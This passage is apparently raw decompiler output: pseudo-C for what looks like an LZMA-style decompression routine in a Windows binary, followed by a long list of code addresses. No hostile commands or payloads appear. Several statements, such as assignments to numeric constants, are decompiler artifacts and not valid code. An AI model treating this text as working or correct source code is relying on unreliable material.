												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                            0x00000000
                                            0x00406ce2
                                            0x00406ce2
                                            0x00406ce6
                                            0x00406cf3
                                            0x00406cfd
                                            0x00000000
                                            0x00406ce8
                                            0x00406ce8
                                            0x00406d23
                                            0x00406d26
                                            0x00406d29
                                            0x00406d2c
                                            0x00406d2c
                                            0x00406d2f
                                            0x00406d36
                                            0x00406d3b
                                            0x00406c1c
                                            0x00406c1f
                                            0x00406f91
                                            0x00406f91
                                            0x00406f91
                                            0x00406f94
                                            0x00406f94
                                            0x00406f94
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406fa6
                                            0x00406fc0
                                            0x00406fc3
                                            0x00406fc9
                                            0x00406fd4
                                            0x00406fd6
                                            0x00406fa8
                                            0x00406fa8
                                            0x00406fb7
                                            0x00406fbb
                                            0x00406fbb
                                            0x00406fe0
                                            0x00000000
                                            0x00000000
                                            0x00406fe2
                                            0x00406fe6
                                            0x00407195
                                            0x004071ab
                                            0x004071b3
                                            0x004071ba
                                            0x004071bc
                                            0x004071c3
                                            0x004071c7
                                            0x004071c7
                                            0x00406ff2
                                            0x00406ff9
                                            0x00407001
                                            0x00407004
                                            0x00407007
                                            0x00407007
                                            0x0040700d
                                            0x0040700d
                                            0x004067a9
                                            0x004067a9
                                            0x004067a9
                                            0x004067b2
                                            0x00000000
                                            0x00000000
                                            0x004067b8
                                            0x00000000
                                            0x004067c3
                                            0x00000000
                                            0x00000000
                                            0x004067cc
                                            0x004067cf
                                            0x004067d2
                                            0x004067d6
                                            0x00000000
                                            0x00000000
                                            0x004067dc
                                            0x004067df
                                            0x004067e1
                                            0x004067e2
                                            0x004067e5
                                            0x004067e7
                                            0x004067e8
                                            0x004067ea
                                            0x004067ed
                                            0x004067f2
                                            0x004067f7
                                            0x00406800
                                            0x00406813
                                            0x00406816
                                            0x00406822
                                            0x0040684a
                                            0x0040684c
                                            0x0040685a
                                            0x0040685a
                                            0x0040685e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040684e
                                            0x0040684e
                                            0x00406851
                                            0x00406852
                                            0x00406852
                                            0x00000000
                                            0x0040684e
                                            0x00406828
                                            0x0040682d
                                            0x0040682d
                                            0x00406836
                                            0x0040683e
                                            0x00406841
                                            0x00000000
                                            0x00406847
                                            0x00406847
                                            0x00000000
                                            0x00406847
                                            0x00000000
                                            0x00406864
                                            0x00406864
                                            0x00406868
                                            0x00407114
                                            0x00000000
                                            0x00407114
                                            0x00406871
                                            0x00406881
                                            0x00406884
                                            0x00406887
                                            0x00406887
                                            0x00406887
                                            0x0040688a
                                            0x0040688e
                                            0x00000000
                                            0x00000000
                                            0x00406890
                                            0x00406896
                                            0x004068c0
                                            0x004068c6
                                            0x004068cd
                                            0x00000000
                                            0x004068cd
                                            0x0040689c
                                            0x0040689f
                                            0x004068a4
                                            0x004068a4
                                            0x004068af
                                            0x004068b7
                                            0x004068ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004068ff
                                            0x00406905
                                            0x00406908
                                            0x00406915
                                            0x0040691d
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00000000
                                            0x004068d4
                                            0x004068d4
                                            0x004068d8
                                            0x00407123
                                            0x00000000
                                            0x00407123
                                            0x004068e4
                                            0x004068ef
                                            0x004068ef
                                            0x004068ef
                                            0x004068f2
                                            0x004068f5
                                            0x004068f8
                                            0x004068fd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406f94
                                            0x00406f94
                                            0x00406f9a
                                            0x00406fa0
                                            0x00406fa6
                                            0x00406fc0
                                            0x00406fc3
                                            0x00406fc9
                                            0x00406fd4
                                            0x00406fd6
                                            0x00406fa8
                                            0x00406fa8
                                            0x00406fb7
                                            0x00406fbb
                                            0x00406fbb
                                            0x00406fe0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406925
                                            0x00406927
                                            0x0040692a
                                            0x0040699b
                                            0x0040699e
                                            0x004069a1
                                            0x004069a8
                                            0x004069b2
                                            0x00406f91
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00406f91
                                            0x0040692c
                                            0x00406930
                                            0x00406933
                                            0x00406935
                                            0x00406938
                                            0x0040693b
                                            0x0040693d
                                            0x00406940
                                            0x00406942
                                            0x00406947
                                            0x0040694a
                                            0x0040694d
                                            0x00406951
                                            0x00406958
                                            0x0040695b
                                            0x00406962
                                            0x00406966
                                            0x0040696e
                                            0x0040696e
                                            0x0040696e
                                            0x00406968
                                            0x00406968
                                            0x00406968
                                            0x0040695d
                                            0x0040695d
                                            0x0040695d
                                            0x00406972
                                            0x00406975
                                            0x00406993
                                            0x00406995
                                            0x00000000
                                            0x00406977
                                            0x00406977
                                            0x0040697a
                                            0x0040697d
                                            0x00406980
                                            0x00406982
                                            0x00406982
                                            0x00406982
                                            0x00406985
                                            0x00406988
                                            0x0040698a
                                            0x0040698b
                                            0x0040698e
                                            0x00000000
                                            0x0040698e
                                            0x00000000
                                            0x00406bc4
                                            0x00406bc8
                                            0x00406be6
                                            0x00406be9
                                            0x00406bf0
                                            0x00406bf3
                                            0x00406bf6
                                            0x00406bf9
                                            0x00406bfc
                                            0x00406bff
                                            0x00406c01
                                            0x00406c08
                                            0x00406c09
                                            0x00406c0b
                                            0x00406c0e
                                            0x00406c11
                                            0x00406c14
                                            0x00406c14
                                            0x00406c19
                                            0x00000000
                                            0x00406c19
                                            0x00406bca
                                            0x00406bcd
                                            0x00406bd0
                                            0x00406bda
                                            0x00406f91
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00000000
                                            0x00406c2e
                                            0x00406c32
                                            0x00406c55
                                            0x00406c58
                                            0x00406c5b
                                            0x00406c65
                                            0x00406c34
                                            0x00406c34
                                            0x00406c37
                                            0x00406c3a
                                            0x00406c3d
                                            0x00406c4a
                                            0x00406c4d
                                            0x00406c4d
                                            0x00406f91
                                            0x00406f91
                                            0x00406f91
                                            0x00000000
                                            0x00406f91
                                            0x00000000
                                            0x00406c71
                                            0x00406c75
                                            0x00000000
                                            0x00000000
                                            0x00406c7b
                                            0x00406c7f
                                            0x00000000
                                            0x00000000
                                            0x00406c85
                                            0x00406c87
                                            0x00406c8b
                                            0x00406c8b
                                            0x00406c8e
                                            0x00406c92
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406d09
                                            0x00406d0d
                                            0x00406d14
                                            0x00406d17
                                            0x00406d1a
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d0f
                                            0x00406d1d
                                            0x00406d20
                                            0x00000000
                                            0x00000000
                                            0x00406dc9
                                            0x00406dc9
                                            0x00406dcd
                                            0x0040716b
                                            0x00000000
                                            0x0040716b
                                            0x00406dd3
                                            0x00406dd6
                                            0x00406dd9
                                            0x00406ddd
                                            0x00406de0
                                            0x00406de6
                                            0x00406de8
                                            0x00406de8
                                            0x00406de8
                                            0x00406deb
                                            0x00406dee
                                            0x00000000
                                            0x00000000
                                            0x004069be
                                            0x004069be
                                            0x004069c2
                                            0x0040712f
                                            0x00000000
                                            0x0040712f
                                            0x004069c8
                                            0x004069cb
                                            0x004069ce
                                            0x004069d2
                                            0x004069d5
                                            0x004069db
                                            0x004069dd
                                            0x004069dd
                                            0x004069dd
                                            0x004069e0
                                            0x004069e3
                                            0x004069e3
                                            0x004069e6
                                            0x004069e9
                                            0x00000000
                                            0x00000000
                                            0x004069ef
                                            0x004069f5
                                            0x00000000
                                            0x00000000
                                            0x004069fb
                                            0x004069fb
                                            0x004069ff
                                            0x00406a02
                                            0x00406a05
                                            0x00406a08
                                            0x00406a0b
                                            0x00406a0c
                                            0x00406a0f
                                            0x00406a11
                                            0x00406a17
                                            0x00406a1a
                                            0x00406a1d
                                            0x00406a20
                                            0x00406a23
                                            0x00406a26
                                            0x00406a29
                                            0x00406a45
                                            0x00406a48
                                            0x00406a4b
                                            0x00406a4e
                                            0x00406a55
                                            0x00406a59
                                            0x00406a5b
                                            0x00406a5f
                                            0x00406a2b
                                            0x00406a2b
                                            0x00406a2f
                                            0x00406a37
                                            0x00406a3c
                                            0x00406a3e
                                            0x00406a40
                                            0x00406a40
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6c
                                            0x00000000
                                            0x00406a72
                                            0x00000000
                                            0x00406a72
                                            0x00000000
                                            0x00406a77
                                            0x00406a77
                                            0x00406a7b
                                            0x0040713b
                                            0x00000000
                                            0x0040713b
                                            0x00406a81
                                            0x00406a84
                                            0x00406a87
                                            0x00406a8b
                                            0x00406a8e
                                            0x00406a94
                                            0x00406a96
                                            0x00406a96
                                            0x00406a96
                                            0x00406a99
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406a9c
                                            0x00406aa2
                                            0x00000000
                                            0x00000000
                                            0x00406aa4
                                            0x00406aa7
                                            0x00406aaa
                                            0x00406aad
                                            0x00406ab0
                                            0x00406ab3
                                            0x00406ab6
                                            0x00406ab9
                                            0x00406abc
                                            0x00406abf
                                            0x00406ac2
                                            0x00406ada
                                            0x00406add
                                            0x00406ae0
                                            0x00406ae3
                                            0x00406ae3
                                            0x00406ae6
                                            0x00406aea
                                            0x00406aec
                                            0x00406ac4
                                            0x00406ac4
                                            0x00406acc
                                            0x00406ad1
                                            0x00406ad3
                                            0x00406ad5
                                            0x00406ad5
                                            0x00406aef
                                            0x00406af6
                                            0x00406af9
                                            0x00000000
                                            0x00406afb
